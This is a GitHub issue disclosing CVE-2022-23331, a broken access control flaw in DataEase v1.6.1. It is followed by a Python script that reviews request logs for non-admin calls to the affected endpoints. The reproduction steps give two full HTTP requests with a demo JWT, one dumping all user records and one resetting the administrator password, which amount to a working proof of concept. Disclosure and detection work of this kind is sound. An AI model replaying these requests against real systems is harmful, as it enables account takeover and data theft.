CVE-2022-23331: Security Issues[Bug] · Issue #1618 · dataease/dataease

In DataEase v1.6.1, an authenticated user can gain unauthorized access to all user information and can change the administrator password.


DataEase version
v1.6.1

Browser version
Chrome 96.0.4664.110

Bug description
I found a Broken Access Control vulnerability.
An authenticated user can access information about all users and change the admin password.

Steps to reproduce the bug (screenshots preferred)

  1. Use the demo login.
  2. This API accesses information about all users:

    ```
    POST /api/user/userGrid/1/10 HTTP/1.1
    Host: dataease.fit2cloud.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Accept-Language: zh-CN
    Accept-Encoding: gzip, deflate
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
    LINK-PWD-TOKEN: null
    Connection: close
    Referer: https://dataease.fit2cloud.com/
    Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
    Content-Length: 13

    {"orders":[]}
    ```

  3. This API changes the admin password:

    ```
    POST /api/user/adminUpdatePwd HTTP/1.1
    Host: dataease.fit2cloud.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Accept-Language: zh-CN
    Accept-Encoding: gzip, deflate
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg
    LINK-PWD-TOKEN: null
    Connection: close
    Referer: https://dataease.fit2cloud.com/
    Cookie: request-time-out=10; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDE4Nzg3MTYsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.m02WO3Uv4xyc2OJztrSOuU7jRBPEmpoj2bGuUr-6nzg; language=zh_CN
    Content-Length: 36

    {"userId":1,"newPassword":"SECtest"}
    ```

Now you can use admin/SECtest to log in.
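
A log-review check for the pattern reported above, added here as an example (not code from the report or from DataEase): it decodes the `userId` claim carried in each request's token and flags non-admin callers on the two endpoints named in the report. That these endpoints are admin-only, that userId 1 is the administrator, and the record layout and sample tokens are assumptions constructed for illustration.

```python
import base64
import json

# Endpoints named in the report; treating them as admin-only is an assumption.
ADMIN_ONLY = ("/api/user/adminUpdatePwd", "/api/user/userGrid/")
ADMIN_IDS = {1}  # assumption: userId 1 is the administrator

def jwt_claims(token):
    """Decode a JWT payload WITHOUT verifying the signature (log triage only)."""
    try:
        payload = token.split(".")[1]
        payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
        claims = json.loads(base64.urlsafe_b64decode(payload))
    except (IndexError, ValueError):
        return None
    return claims if isinstance(claims, dict) else None

def review(records):
    """Return (path, caller_id, reason) for requests crossing a privilege boundary."""
    findings = []
    for rec in records:
        claims = jwt_claims(rec.get("authorization", ""))
        if claims is None:
            findings.append((rec["path"], None, "unparseable token"))
            continue
        caller = claims.get("userId")
        if caller in ADMIN_IDS:
            continue
        if rec["path"].startswith(ADMIN_ONLY):
            findings.append((rec["path"], caller, "non-admin caller on admin endpoint"))
        body = rec.get("body")
        target = body.get("userId") if isinstance(body, dict) else None
        if target is not None and target != caller:
            findings.append((rec["path"], caller, f"acts on userId {target}"))
    return findings

def make_token(claims):  # constructed, unsigned sample token (not a real credential)
    enc = lambda o: base64.urlsafe_b64encode(json.dumps(o).encode()).rstrip(b"=").decode()
    return f"{enc({'typ': 'JWT', 'alg': 'HS256'})}.{enc(claims)}.sig"

DEMO, ADMIN = make_token({"userId": 2, "username": "demo"}), make_token({"userId": 1, "username": "admin"})
SAMPLE = [  # constructed records mirroring the two requests in the report
    {"path": "/api/user/userGrid/1/10", "authorization": DEMO, "body": {"orders": []}},
    {"path": "/api/user/adminUpdatePwd", "authorization": DEMO, "body": {"userId": 1, "newPassword": "<redacted>"}},
    {"path": "/api/user/adminUpdatePwd", "authorization": ADMIN, "body": {"userId": 3, "newPassword": "<redacted>"}},
]

if __name__ == "__main__":
    print(*review(SAMPLE), sep="\n")
```

The same comparison of the token's `userId` against the endpoint's required role and the body's target `userId` is the check the server has to enforce before acting; the log review only finds requests where it was missing.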
